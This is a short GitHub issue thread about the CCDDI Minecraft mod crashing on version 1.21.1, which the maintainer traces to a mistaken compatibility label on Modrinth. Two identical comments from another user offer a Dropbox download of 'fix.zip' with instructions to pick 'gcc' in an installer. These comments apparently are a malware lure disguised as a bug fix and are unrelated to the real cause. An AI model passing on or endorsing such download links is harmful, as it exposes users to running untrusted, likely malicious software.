### ISSUE TITLE
v1.0.1 is not compatible with Minecraft 1.21.1

### ISSUE THREAD

**Issue by adriencyr** [snackerpirater/CCDDI#1]
Attempting to launch Minecraft 1.21.1 with v1.0.1 of the mod will crash with an incompatible version error when v1.0.1 is stated to be compatible with 1.21.1.
![90bcf7c1f5e14220909a6eebdb64777b](https://github.com/user-attachments/assets/133e789a-beb8-4f20-a53e-52aecc11f448)

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by snackerpirater** [comment]
My fault, I accidentally marked it as 1.21.1 compatible on Modrinth. A proper release for 1.21.1 is in the works.
